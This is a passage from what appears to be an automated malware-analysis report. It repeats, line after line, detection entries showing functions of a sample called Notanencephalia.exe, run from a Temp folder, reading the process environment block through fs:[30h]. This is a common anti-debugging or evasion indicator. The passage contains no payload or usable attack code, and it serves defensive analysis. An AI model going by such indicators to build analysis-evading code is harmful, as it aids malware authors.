      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FDA1FCD mov eax, dword ptr fs:[00000030h]14_2_1FDA1FCD
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FDA1FCD mov eax, dword ptr fs:[00000030h]14_2_1FDA1FCD
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FDA1FCD mov eax, dword ptr fs:[00000030h]14_2_1FDA1FCD
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE2BFC0 mov ecx, dword ptr fs:[00000030h]14_2_1FE2BFC0
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE2BFC0 mov eax, dword ptr fs:[00000030h]14_2_1FE2BFC0
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE43FC0 mov eax, dword ptr fs:[00000030h]14_2_1FE43FC0
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FDABFEC mov eax, dword ptr fs:[00000030h]14_2_1FDABFEC
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FDABFEC mov eax, dword ptr fs:[00000030h]14_2_1FDABFEC
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FDABFEC mov eax, dword ptr fs:[00000030h]14_2_1FDABFEC
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD6FF90 mov edi, dword ptr fs:[00000030h]14_2_1FD6FF90
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD81F92 mov ecx, dword ptr fs:[00000030h]14_2_1FD81F92
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD81F92 mov ecx, dword ptr fs:[00000030h]14_2_1FD81F92
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD81F92 mov eax, dword ptr fs:[00000030h]14_2_1FD81F92
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD81F92 mov ecx, dword ptr fs:[00000030h]14_2_1FD81F92
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD81F92 mov ecx, dword ptr fs:[00000030h]14_2_1FD81F92
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD81F92 mov eax, dword ptr fs:[00000030h]14_2_1FD81F92
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD81F92 mov ecx, dword ptr fs:[00000030h]14_2_1FD81F92
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD81F92 mov ecx, dword ptr fs:[00000030h]14_2_1FD81F92
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD81F92 mov eax, dword ptr fs:[00000030h]14_2_1FD81F92
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD81F92 mov ecx, dword ptr fs:[00000030h]14_2_1FD81F92
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD81F92 mov ecx, dword ptr fs:[00000030h]14_2_1FD81F92
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD81F92 mov eax, dword ptr fs:[00000030h]14_2_1FD81F92
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FDB1FB8 mov eax, dword ptr fs:[00000030h]14_2_1FDB1FB8
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FDABFB0 mov eax, dword ptr fs:[00000030h]14_2_1FDABFB0
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE13F90 mov eax, dword ptr fs:[00000030h]14_2_1FE13F90
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE13F90 mov eax, dword ptr fs:[00000030h]14_2_1FE13F90
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD71F50 mov eax, dword ptr fs:[00000030h]14_2_1FD71F50
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FDA7F51 mov eax, dword ptr fs:[00000030h]14_2_1FDA7F51
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FDEFF42 mov eax, dword ptr fs:[00000030h]14_2_1FDEFF42
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD9BF60 mov eax, dword ptr fs:[00000030h]14_2_1FD9BF60
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FDF1F13 mov eax, dword ptr fs:[00000030h]14_2_1FDF1F13
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE2DF2F mov eax, dword ptr fs:[00000030h]14_2_1FE2DF2F
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FDFDF10 mov eax, dword ptr fs:[00000030h]14_2_1FDFDF10
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE17F3E mov eax, dword ptr fs:[00000030h]14_2_1FE17F3E
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE3BEE6 mov eax, dword ptr fs:[00000030h]14_2_1FE3BEE6
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE3BEE6 mov eax, dword ptr fs:[00000030h]14_2_1FE3BEE6
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE3BEE6 mov eax, dword ptr fs:[00000030h]14_2_1FE3BEE6
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE3BEE6 mov eax, dword ptr fs:[00000030h]14_2_1FE3BEE6
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD6BEC0 mov eax, dword ptr fs:[00000030h]14_2_1FD6BEC0
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD6BEC0 mov eax, dword ptr fs:[00000030h]14_2_1FD6BEC0
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD7BEC0 mov eax, dword ptr fs:[00000030h]14_2_1FD7BEC0
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD7BEC0 mov eax, dword ptr fs:[00000030h]14_2_1FD7BEC0
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD7BEC0 mov eax, dword ptr fs:[00000030h]14_2_1FD7BEC0
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD7BEC0 mov eax, dword ptr fs:[00000030h]14_2_1FD7BEC0
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD7BEC0 mov eax, dword ptr fs:[00000030h]14_2_1FD7BEC0
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD7BEC0 mov eax, dword ptr fs:[00000030h]14_2_1FD7BEC0
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD7BEC0 mov eax, dword ptr fs:[00000030h]14_2_1FD7BEC0
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD7BEC0 mov eax, dword ptr fs:[00000030h]14_2_1FD7BEC0
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD9FEC0 mov eax, dword ptr fs:[00000030h]14_2_1FD9FEC0
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FDFFEC5 mov eax, dword ptr fs:[00000030h]14_2_1FDFFEC5
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD73EF4 mov eax, dword ptr fs:[00000030h]14_2_1FD73EF4
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD73EF4 mov eax, dword ptr fs:[00000030h]14_2_1FD73EF4
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD73EF4 mov eax, dword ptr fs:[00000030h]14_2_1FD73EF4
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FDA3EEB mov ecx, dword ptr fs:[00000030h]14_2_1FDA3EEB
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FDA3EEB mov eax, dword ptr fs:[00000030h]14_2_1FDA3EEB
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FDA3EEB mov eax, dword ptr fs:[00000030h]14_2_1FDA3EEB
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD73EE1 mov eax, dword ptr fs:[00000030h]14_2_1FD73EE1
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE29EDF mov eax, dword ptr fs:[00000030h]14_2_1FE29EDF
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE29EDF mov eax, dword ptr fs:[00000030h]14_2_1FE29EDF
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD77E96 mov eax, dword ptr fs:[00000030h]14_2_1FD77E96
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FDFDE9B mov eax, dword ptr fs:[00000030h]14_2_1FDFDE9B
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE1DEB0 mov eax, dword ptr fs:[00000030h]14_2_1FE1DEB0
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE1DEB0 mov ecx, dword ptr fs:[00000030h]14_2_1FE1DEB0
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE1DEB0 mov eax, dword ptr fs:[00000030h]14_2_1FE1DEB0
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE1DEB0 mov eax, dword ptr fs:[00000030h]14_2_1FE1DEB0
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE1DEB0 mov eax, dword ptr fs:[00000030h]14_2_1FE1DEB0
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE2DEB0 mov eax, dword ptr fs:[00000030h]14_2_1FE2DEB0
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FDA3E8F mov eax, dword ptr fs:[00000030h]14_2_1FDA3E8F
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD6DEA5 mov eax, dword ptr fs:[00000030h]14_2_1FD6DEA5
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD6DEA5 mov ecx, dword ptr fs:[00000030h]14_2_1FD6DEA5
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FDFDEAA mov eax, dword ptr fs:[00000030h]14_2_1FDFDEAA
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD6FEA0 mov eax, dword ptr fs:[00000030h]14_2_1FD6FEA0
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FDABE51 mov eax, dword ptr fs:[00000030h]14_2_1FDABE51
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FDABE51 mov eax, dword ptr fs:[00000030h]14_2_1FDABE51
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD85E40 mov eax, dword ptr fs:[00000030h]14_2_1FD85E40
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE2DE46 mov eax, dword ptr fs:[00000030h]14_2_1FE2DE46
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD6BE78 mov ecx, dword ptr fs:[00000030h]14_2_1FD6BE78
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE19E56 mov ecx, dword ptr fs:[00000030h]14_2_1FE19E56
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD6DE10 mov eax, dword ptr fs:[00000030h]14_2_1FD6DE10
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FDABE17 mov eax, dword ptr fs:[00000030h]14_2_1FDABE17
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE45E37 mov eax, dword ptr fs:[00000030h]14_2_1FE45E37
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE45E37 mov eax, dword ptr fs:[00000030h]14_2_1FE45E37
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE45E37 mov eax, dword ptr fs:[00000030h]14_2_1FE45E37
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD71E30 mov eax, dword ptr fs:[00000030h]14_2_1FD71E30
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD71E30 mov eax, dword ptr fs:[00000030h]14_2_1FD71E30
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE43E10 mov eax, dword ptr fs:[00000030h]14_2_1FE43E10
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE43E10 mov eax, dword ptr fs:[00000030h]14_2_1FE43E10
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD8DE2D mov eax, dword ptr fs:[00000030h]14_2_1FD8DE2D
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD8DE2D mov eax, dword ptr fs:[00000030h]14_2_1FD8DE2D
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD8DE2D mov eax, dword ptr fs:[00000030h]14_2_1FD8DE2D
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD73DD0 mov eax, dword ptr fs:[00000030h]14_2_1FD73DD0
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD73DD0 mov eax, dword ptr fs:[00000030h]14_2_1FD73DD0
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FDFDDC0 mov eax, dword ptr fs:[00000030h]14_2_1FDFDDC0
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE3DDC6 mov eax, dword ptr fs:[00000030h]14_2_1FE3DDC6
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE2DDC7 mov eax, dword ptr fs:[00000030h]14_2_1FE2DDC7
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD69D96 mov eax, dword ptr fs:[00000030h]14_2_1FD69D96
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD69D96 mov eax, dword ptr fs:[00000030h]14_2_1FD69D96
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD69D96 mov ecx, dword ptr fs:[00000030h]14_2_1FD69D96
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE05DA0 mov eax, dword ptr fs:[00000030h]14_2_1FE05DA0
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE05DA0 mov eax, dword ptr fs:[00000030h]14_2_1FE05DA0
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE05DA0 mov eax, dword ptr fs:[00000030h]14_2_1FE05DA0
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE05DA0 mov ecx, dword ptr fs:[00000030h]14_2_1FE05DA0
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD6FD80 mov eax, dword ptr fs:[00000030h]14_2_1FD6FD80
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD8DDB1 mov eax, dword ptr fs:[00000030h]14_2_1FD8DDB1
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD8DDB1 mov eax, dword ptr fs:[00000030h]14_2_1FD8DDB1
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD8DDB1 mov eax, dword ptr fs:[00000030h]14_2_1FD8DDB1
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FDFDDB1 mov eax, dword ptr fs:[00000030h]14_2_1FDFDDB1
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FDA9DAF mov eax, dword ptr fs:[00000030h]14_2_1FDA9DAF
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD7FDA9 mov eax, dword ptr fs:[00000030h]14_2_1FD7FDA9
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE29D70 mov eax, dword ptr fs:[00000030h]14_2_1FE29D70
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE29D70 mov eax, dword ptr fs:[00000030h]14_2_1FE29D70
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FDABD4E mov eax, dword ptr fs:[00000030h]14_2_1FDABD4E
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FDABD4E mov eax, dword ptr fs:[00000030h]14_2_1FDABD4E
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD67D41 mov eax, dword ptr fs:[00000030h]14_2_1FD67D41
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD83D40 mov eax, dword ptr fs:[00000030h]14_2_1FD83D40
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD83D40 mov eax, dword ptr fs:[00000030h]14_2_1FD83D40
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD83D40 mov eax, dword ptr fs:[00000030h]14_2_1FD83D40
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD83D40 mov eax, dword ptr fs:[00000030h]14_2_1FD83D40
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD83D40 mov ecx, dword ptr fs:[00000030h]14_2_1FD83D40
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD83D40 mov ecx, dword ptr fs:[00000030h]14_2_1FD83D40
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD83D40 mov eax, dword ptr fs:[00000030h]14_2_1FD83D40
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD83D40 mov ecx, dword ptr fs:[00000030h]14_2_1FD83D40
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD83D40 mov ecx, dword ptr fs:[00000030h]14_2_1FD83D40
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD83D40 mov eax, dword ptr fs:[00000030h]14_2_1FD83D40
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD83D40 mov ecx, dword ptr fs:[00000030h]14_2_1FD83D40
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD83D40 mov ecx, dword ptr fs:[00000030h]14_2_1FD83D40
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD83D40 mov eax, dword ptr fs:[00000030h]14_2_1FD83D40
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD83D40 mov eax, dword ptr fs:[00000030h]14_2_1FD83D40
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD83D40 mov eax, dword ptr fs:[00000030h]14_2_1FD83D40
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD83D40 mov eax, dword ptr fs:[00000030h]14_2_1FD83D40
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD83D40 mov eax, dword ptr fs:[00000030h]14_2_1FD83D40
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD83D40 mov eax, dword ptr fs:[00000030h]14_2_1FD83D40
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD83D40 mov eax, dword ptr fs:[00000030h]14_2_1FD83D40
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD83D40 mov eax, dword ptr fs:[00000030h]14_2_1FD83D40
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FDFDD47 mov eax, dword ptr fs:[00000030h]14_2_1FDFDD47
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE1FD78 mov eax, dword ptr fs:[00000030h]14_2_1FE1FD78
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE1FD78 mov eax, dword ptr fs:[00000030h]14_2_1FE1FD78
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE1FD78 mov eax, dword ptr fs:[00000030h]14_2_1FE1FD78
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE1FD78 mov eax, dword ptr fs:[00000030h]14_2_1FE1FD78
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE1FD78 mov eax, dword ptr fs:[00000030h]14_2_1FE1FD78
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD77D75 mov eax, dword ptr fs:[00000030h]14_2_1FD77D75
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD77D75 mov eax, dword ptr fs:[00000030h]14_2_1FD77D75
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE45D50 mov eax, dword ptr fs:[00000030h]14_2_1FE45D50
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE45D50 mov eax, dword ptr fs:[00000030h]14_2_1FE45D50
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE31D5A mov eax, dword ptr fs:[00000030h]14_2_1FE31D5A
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE31D5A mov eax, dword ptr fs:[00000030h]14_2_1FE31D5A
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE31D5A mov eax, dword ptr fs:[00000030h]14_2_1FE31D5A
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE31D5A mov eax, dword ptr fs:[00000030h]14_2_1FE31D5A
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD83D00 mov eax, dword ptr fs:[00000030h]14_2_1FD83D00
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FDFFD2A mov eax, dword ptr fs:[00000030h]14_2_1FDFFD2A
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FDFFD2A mov eax, dword ptr fs:[00000030h]14_2_1FDFFD2A
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD83D20 mov eax, dword ptr fs:[00000030h]14_2_1FD83D20
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD67CD5 mov eax, dword ptr fs:[00000030h]14_2_1FD67CD5
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD67CD5 mov eax, dword ptr fs:[00000030h]14_2_1FD67CD5
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD67CD5 mov eax, dword ptr fs:[00000030h]14_2_1FD67CD5
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD67CD5 mov eax, dword ptr fs:[00000030h]14_2_1FD67CD5
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD67CD5 mov eax, dword ptr fs:[00000030h]14_2_1FD67CD5
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FDF3CDB mov eax, dword ptr fs:[00000030h]14_2_1FDF3CDB
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FDF3CDB mov eax, dword ptr fs:[00000030h]14_2_1FDF3CDB
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FDF3CDB mov eax, dword ptr fs:[00000030h]14_2_1FDF3CDB
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE11CF9 mov eax, dword ptr fs:[00000030h]14_2_1FE11CF9
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE11CF9 mov eax, dword ptr fs:[00000030h]14_2_1FE11CF9
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE11CF9 mov eax, dword ptr fs:[00000030h]14_2_1FE11CF9
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FDA5CC0 mov eax, dword ptr fs:[00000030h]14_2_1FDA5CC0
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FDA5CC0 mov eax, dword ptr fs:[00000030h]14_2_1FDA5CC0
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD81CC7 mov eax, dword ptr fs:[00000030h]14_2_1FD81CC7
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD81CC7 mov eax, dword ptr fs:[00000030h]14_2_1FD81CC7
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE1FCDF mov eax, dword ptr fs:[00000030h]14_2_1FE1FCDF
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE1FCDF mov eax, dword ptr fs:[00000030h]14_2_1FE1FCDF
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE1FCDF mov eax, dword ptr fs:[00000030h]14_2_1FE1FCDF
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE2FCAB mov eax, dword ptr fs:[00000030h]14_2_1FE2FCAB
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE2FCAB mov eax, dword ptr fs:[00000030h]14_2_1FE2FCAB
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE2FCAB mov eax, dword ptr fs:[00000030h]14_2_1FE2FCAB
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE2FCAB mov eax, dword ptr fs:[00000030h]14_2_1FE2FCAB
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE2FCAB mov eax, dword ptr fs:[00000030h]14_2_1FE2FCAB
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE2FCAB mov eax, dword ptr fs:[00000030h]14_2_1FE2FCAB
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE2FCAB mov eax, dword ptr fs:[00000030h]14_2_1FE2FCAB
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE2FCAB mov eax, dword ptr fs:[00000030h]14_2_1FE2FCAB
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE2FCAB mov eax, dword ptr fs:[00000030h]14_2_1FE2FCAB
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE2FCAB mov eax, dword ptr fs:[00000030h]14_2_1FE2FCAB
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE2FCAB mov eax, dword ptr fs:[00000030h]14_2_1FE2FCAB
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE2FCAB mov eax, dword ptr fs:[00000030h]14_2_1FE2FCAB
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE2FCAB mov eax, dword ptr fs:[00000030h]14_2_1FE2FCAB
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE2FCAB mov eax, dword ptr fs:[00000030h]14_2_1FE2FCAB
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD73C84 mov eax, dword ptr fs:[00000030h]14_2_1FD73C84
